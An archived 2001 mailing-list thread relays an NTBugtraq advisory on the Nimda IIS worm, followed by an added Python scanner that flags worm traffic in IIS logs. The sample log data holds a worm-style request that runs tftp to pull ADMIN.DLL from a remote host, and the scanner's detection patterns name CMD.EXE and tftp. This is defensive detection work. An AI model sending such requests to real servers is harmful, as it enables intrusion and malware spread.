Thanks! Got it!

> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> Jerry Murdock
> Sent: Tuesday, September 18, 2001 3:02 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
> Subject: Re: [imail] OT: Alert: New IIS Worm
> 
> 
> Try these direct links:
> 
> ftp://ftp.hi.is/pub/mirrors/complex.is/pub/fp-def.zip
> http://www4.complex.is/files/fp-def.zip
> 
> Jerry
> 
> 
> ----- Original Message ----- 
> From: "Fox, Thomas" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, September 18, 2001 2:52 PM
> Subject: RE: [imail] OT: Alert: New IIS Worm
> 
> 
> > If anyone has downloaded this, could they forward it
> > to me? We can't get to F-Prot's site
> > 
> > 
> > > -----Original Message-----
> > > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> > > Jerry Murdock
> > > Sent: Tuesday, September 18, 2001 1:56 PM
> > > To: [EMAIL PROTECTED]
> > > Subject: Re: [imail] OT: Alert: New IIS Worm
> > > 
> > > 
> > > FYI:
> > > 
> > > F-Prot users.  The update for this was just released.  Get 
> > > the new fp-def.zip.
> > > 
> > > Jerry
> > > 
> > > ----- Original Message -----
> > > From: "Terrence Koeman" <[EMAIL PROTECTED]>
> > > To: <[EMAIL PROTECTED]>
> > > Sent: Tuesday, September 18, 2001 12:42 PM
> > > Subject: [imail] OT: Alert: New IIS Worm
> > > 
> > > 
> > > > Off-topic
> > > >
> > > > From NTBUGTRAQ:
> > > >
> > > > ------------------------
> > > > There have been numerous reports of IIS attacks being generated by
> > > > machines over a broad range of IP addresses. These "infected"
> > > > machines are using a wide variety of attacks which attempt to exploit
> > > > already known and patched vulnerabilities against IIS.
> > > >
> > > > It appears that the attacks can come both from email and from the
> > > > network.
> > > >
> > > > A new worm, being called w32.nimda.amm, is being sent around. The
> > > > attachment is called README.EXE and comes as a MIME-type of
> > > > "audio/x-wav" together with some html parts. There appears to be no
> > > > text in this message when it is displayed by Outlook when in
> > > > Auto-Preview mode (always a good indication there's something not
> > > > quite right with an email.)
> > > >
> > > > The network attacks against IIS boxes are a wide variety of attacks.
> > > > Amongst them appear to be several attacks that assume the machine is
> > > > compromised by Code Red II (looking for ROOT.EXE in the /scripts and
> > > > /msadc directory, as well as an attempt to use the /c and /d virtual
> > > > roots to get to CMD.EXE). Further, it attempts to exploit numerous
> > > > other known IIS vulnerabilities.
> > > >
> > > > One thing to note is the attempt to execute TFTP.EXE to download a
> > > > file called ADMIN.DLL from (presumably) some previously compromised
> > > > box.
> > > >
> > > > Anyone who discovers a compromised machine (a machine with ADMIN.DLL
> > > > in the /scripts directory), please forward me a copy of that .dll
> > > > ASAP.
> > > >
> > > > Also, look for TFTP traffic (UDP 69). As a safeguard, consider doing
> > > > the following:
> > > >
> > > > edit %systemroot%/system32/drivers/etc/services.
> > > >
> > > > change the line
> > > >
> > > > tftp 69/udp
> > > >
> > > > to
> > > >
> > > > tftp 0/udp
> > > >
> > > > thereby disabling the TFTP client. W2K has TFTP.EXE protected by
> > > > Windows File Protection so it can't be removed.
> > > >
> > > > More information as it arises.
> > > >
> > > > Cheers,
> > > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> > > > ------------------------
> > > > Ok, whoa horsy, I've got lots of copies of ADMIN.DLL now, thanks!
> > > >
> > > > Analysis is still on-going to determine precisely what the infecting
> > > > files do (there are potentially two, ADMIN.DLL and README.EXE).
> > > >
> > > > Some people have said their boxes seem unstable. It could be because
> > > > of numerous copies of TFTP.EXE in memory. At this point it might be
> > > > best to disconnect any computer that appears unstable from the
> > > > network, until such time as sufficient analysis has been performed to
> > > > advise how best to bring the box back on-line.
> > > >
> > > > It is also possible for client machines to perform the attacks that
> > > > we're seeing; if you have a way to filter outbound HTTP requests you
> > > > should look for anything that contains "/scripts" or "tftp" in the
> > > > URL and treat it as suspicious.
> > > >
> > > > The internal threat by this one is no different (and maybe worse)
> > > > than CRII. We've seen indications of WNetEnumResource calls as well
> > > > as references to IPC$. There may be NetBIOS share activity associated
> > > > with the worm, and if so, it will likely spread rapidly internally.
> > > >
> > > > More than likely you will see the biggest effect in terms of a DoS
> > > > (from many source machines). This thing cares not whether you're an
> > > > IIS box or not, it tries regardless. As this spreads the effects may
> > > > become more severe (no, I'm not going to provide a quote on how
> > > > severe). Make sure your inbound (and preferably your outbound)
> > > > router rules are restricted to only those protocols that must be
> > > > present, and ideally to machine IP addresses that should have access.
> > > >
> > > > More as it becomes available.
> > > >
> > > > Cheers,
> > > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> > > > ------------------------
> > > > Numerous people have reported that on IIS servers infected with
> > > > w32.nimda.amm, when visitors browse to their website the visitor is
> > > > offered up README.EML, which in turn downloads README.EXE to the
> > > > visitor.
> > > >
> > > > Please, check your IIS boxes now to see if you are infected. I've had
> > > > reports of IIS servers with more than 10,000 .eml files present
> > > > (mostly as a result of nimda).
> > > >
> > > > While we don't have any conclusive disinfecting procedures yet, any
> > > > IIS box that has been infected definitely shouldn't be available to
> > > > clients until we do.
> > > >
> > > > Cheers,
> > > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> > > > ------------------------
> > > >
> > > >
> > > > --
> > > > Regards,
> > > >
> > > > Terrence Koeman
> > > >
> > > > Technical Director/Administrator
> > > > MediaMonks B.V. (www.mediamonks.nl)
> > > >
> > > > Please quote all replies in correspondence.
> > > 
> > > ______________________________________________________________________
> > > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> > > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> > > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> > > To Manage your Subscription......... http://humankindsystems.com/lists
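The advisory quoted above tells administrators to look for ROOT.EXE probes against /scripts and /msadc, CMD.EXE reached via the /c and /d virtual roots, "tftp" in request URLs, ADMIN.DLL in /scripts and .eml files being served to visitors. The following is an added example, not code from anyone in this thread, that applies those checks to IIS W3C-format log lines; the log lines, IP addresses and field order are constructed for the demo.

```python
# Added example, not part of this thread: scan IIS W3C extended log lines
# for the request patterns the NTBugtraq advisory describes.
import re
from collections import Counter

# Assumed field order: date time c-ip cs-method cs-uri-stem cs-uri-query
# sc-status, with '-' marking an empty query (constructed sample data).
SAMPLE_LOG = """\
2001-09-18 14:02:11 192.0.2.10 GET /default.htm - 200
2001-09-18 14:02:13 198.51.100.7 GET /scripts/root.exe - 404
2001-09-18 14:02:13 198.51.100.7 GET /msadc/root.exe - 404
2001-09-18 14:02:14 198.51.100.7 GET /c/winnt/system32/cmd.exe - 404
2001-09-18 14:02:14 198.51.100.7 GET /d/winnt/system32/cmd.exe - 404
2001-09-18 14:02:15 198.51.100.7 GET /scripts/root.exe /c+tftp+-i+198.51.100.7+GET+Admin.dll 502
2001-09-18 14:03:40 203.0.113.5 GET /scripts/admin.dll - 200
2001-09-18 14:04:02 192.0.2.11 GET /readme.eml - 200
"""

# (label, pattern matched against "stem?query", meaning for the defender)
RULES = [
    ("crii-backdoor", re.compile(r"^/(scripts|msadc)/root\.exe", re.I),
     "probe for a Code Red II ROOT.EXE backdoor"),
    ("virtual-root-cmd", re.compile(r"^/[cd]/winnt/system32/cmd\.exe", re.I),
     "CMD.EXE reached through the /c or /d virtual root"),
    ("tftp-fetch", re.compile(r"tftp", re.I),
     "tftp in the URL: attempt to pull a file onto this host"),
    ("admin-dll-present", re.compile(r"^/scripts/admin\.dll$", re.I),
     "ADMIN.DLL served from /scripts: this server is compromised"),
    ("eml-served", re.compile(r"\.eml$", re.I),
     ".eml served to a visitor: this server is infected"),
]

def classify(line):
    """Return the rule labels matching one log line ([] if clean or malformed)."""
    parts = line.split()
    if len(parts) < 7:
        return []
    stem, query = parts[4], parts[5]
    url = stem if query == "-" else f"{stem}?{query}"
    return [label for label, rx, _ in RULES if rx.search(url)]

def scan(log_text):
    """Summarise a log: hits per rule, attacking sources, and whether the
    server itself shows signs of infection (ADMIN.DLL or .eml served)."""
    hits, sources, flagged = Counter(), set(), []
    for line in log_text.splitlines():
        labels = classify(line)
        if labels:
            hits.update(labels)
            sources.add(line.split()[2])
            flagged.append((labels, line))
    infected = bool(hits["admin-dll-present"] or hits["eml-served"])
    return {"hits": dict(hits), "sources": sorted(sources),
            "server_infected": infected, "flagged": flagged}
```

Hits from a server's own visitors on `admin.dll` or `.eml` mean the server is serving the worm, not merely being probed, which is the distinction the advisory draws when it asks infected IIS boxes to be taken offline.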